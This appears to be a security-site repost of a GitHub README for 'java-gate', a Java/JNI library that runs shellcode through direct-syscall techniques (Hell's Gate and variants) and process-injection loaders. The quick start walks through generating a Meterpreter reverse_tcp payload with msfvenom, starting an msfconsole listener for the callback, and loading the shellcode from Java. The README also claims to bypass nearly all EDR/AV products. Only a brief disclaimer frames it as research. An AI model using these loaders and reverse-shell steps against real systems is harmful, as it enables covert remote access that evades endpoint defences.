Java JNI HellsGate/HalosGate/TartarusGate/RecycledGate/SSN Syscall/Many Shellcode Loaders

渗透技巧 1年前 (2023) admin
314 0 0

The java-gate project allows for the implementation of various techniques related to “Hell’s Gate” using simple Java code, which involves direct system calls.

byte[] shellcode = new byte[] {(byte)0xfc, (byte)0x48, ...};
HellsGate gate = new HellsGate(shellcode);
gate.exec();

Furthermore, it supports various techniques derived from “Hell’s Gate,” such as “Halo’s Gate,” “Recycled Gate,” and “Tartarus Gate,” among others. In addition to system call-related functionalities, it is compiled and built using C and NASM/MASM assembly, and invoked at the Java layer through JNI. The project also provides many common methods for injecting shellcode, such as APC injection and remote thread injection. All these low-level techniques can be achieved using simple Java code.

Introduction

Why named “java-gate”: This project mainly integrates various techniques related to direct system calls, such as Hell’s Gate and Halo’s Gate. Therefore, it is named “Java Gate,” which can also be understood as a gateway between Java and the underlying system.

Note:

  • This project only supports 64-bit Windows and 64-bit JVM (as per JNI’s requirement that a 64-bit JVM can only load 64-bit DLLs).
  • It is recommended to use 64-bit shellcode (e.g., windows/x64/meterpreter/reverse_tcp).
  • Loading shellcode in any way may potentially cause JVM crashes (e.g., if the shellcode does not restore the context).

Quick Start

(1) Add the jitpack repository to your Maven configuration:

<repositories>
    <repository>
        <id>jitpack.io</id>
        <url>https://jitpack.io</url>
    </repository>
</repositories>

(2) Import the project:

<dependency>
    <groupId>com.github.4ra1n</groupId>
    <artifactId>java-gate</artifactId>
    <version>0.0.1</version>
</dependency>

(3) Obtain the shellcode

Here, we’ll use meterpreter as an example.

msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=YOUR-IP LPORT=YOUR-PORT -f java

(4) Start the msfconsole listener

Here, we’ll use meterpreter as an example.

msfconsole -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_tcp;set LHOST 0.0.0.0;set LPORT YOUR-PORT;run;"

(5) Write a test program

package me.n1ar4;

import me.n1ar4.gate.core.HellsGate;

public class Main {
    public static void main(String[] args) {
        byte buf[] = new byte[]
                {
                        (byte) 0xfc, (byte) 0x48, ...
                };
        HellsGate gate = new HellsGate(buf);
        gate.exec();
    }
}

(6) Go online

The msfconsole connection is successfully established.

The system call modules are as follows. Usage is similar to the previous examples, just change the class name.

Module Class Description Optional
hells-gate me.n1ar4.gate.core.HellsGate Hells Gate /
halos-gate me.n1ar4.gate.core.HalosGate Halos Gate /
recycled-gate me.n1ar4.gate.core.RecycledGate Recycled Gate /
ssn-syscall me.n1ar4.gate.core.SSNSyscall SSN Syscall /
tartarus-gate me.n1ar4.gate.core.TartarusGate Tartarus Gate /

The loader modules are as follows. Usage is similar to the previous examples, just change the class name.

Module Class Description Optional
apc1 me.n1ar4.gate.loader.APC1Loader APC injection using NtTestAlert /
apc2 me.n1ar4.gate.loader.APC2Loader Simple thread-based APC injection /
crt me.n1ar4.gate.loader.CRTLoader Simple remote thread injection Process name
divide me.n1ar4.gate.loader.DivideLoader Create process and inject into it /
early-bird me.n1ar4.gate.loader.EarlyBirdLoader Create new process and APC inject /
etwp me.n1ar4.gate.loader.EtwpLoader EtwpCreateEtwThread-based injection /
rip me.n1ar4.gate.loader.RIPLoader Modify thread context RIP register and execute shellcode /

Here is an example of how to use the command-line tool.

java -jar java-gate.jar [module] [shellcode-hex-string] [optional]

Since the JVM may crash, there is a way to create a new process and execute the code.

java -jar java-gate.jar run-new-jvm [module] [shellcode-hex-string]

This is also an approach, and if you want to run this project in your custom code, you can refer to the code JavaGate#runNewJVM.

Build

There are pre-packaged versions available in the “Release” section, but if you are not confident or need to add your own features, you can manually build it by following these steps:

Please note that this project only supports Windows 64-bit and JVM 64-bit environments, so it can only be compiled and built in that environment.

(1) MSVC x64

The CMake Toolchains use the MSVC x64 tool, and most of the assembly is based on the ml64 compiler from MSVC.

(2) CMake 3.x

The C and assembly code is compiled and built using CMake to generate the corresponding DLL file for JNI. It is recommended to use CLion.

(3) NASM

Most of the assembly is compiled using MASM, but some assembly is compiled using NASM, which needs to be downloaded and configured separately in the PATH.

(4) JDK 8 & Maven

The Java part of the code is built using Java 8 and Maven. It is recommended to use IDEA.

(5) Python 3.x

This project uses Python for some auxiliary tools, which is not actually a necessary option.

Some tests

Almost Bypass all EDR/AV

References and Acknowledgements

Many thanks to the following excellent projects for providing code (most of the code in this project is based on these):

Disclaimer

This tool is intended for cybersecurity research and educational purposes only. It should not be used for any illegal activities.

 

原文始发于Github:Java JNI HellsGate/HalosGate/TartarusGate/RecycledGate/SSN Syscall/Many Shellcode Loaders

版权声明:admin 发表于 2023年7月5日 上午8:51。
转载请注明:Java JNI HellsGate/HalosGate/TartarusGate/RecycledGate/SSN Syscall/Many Shellcode Loaders | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...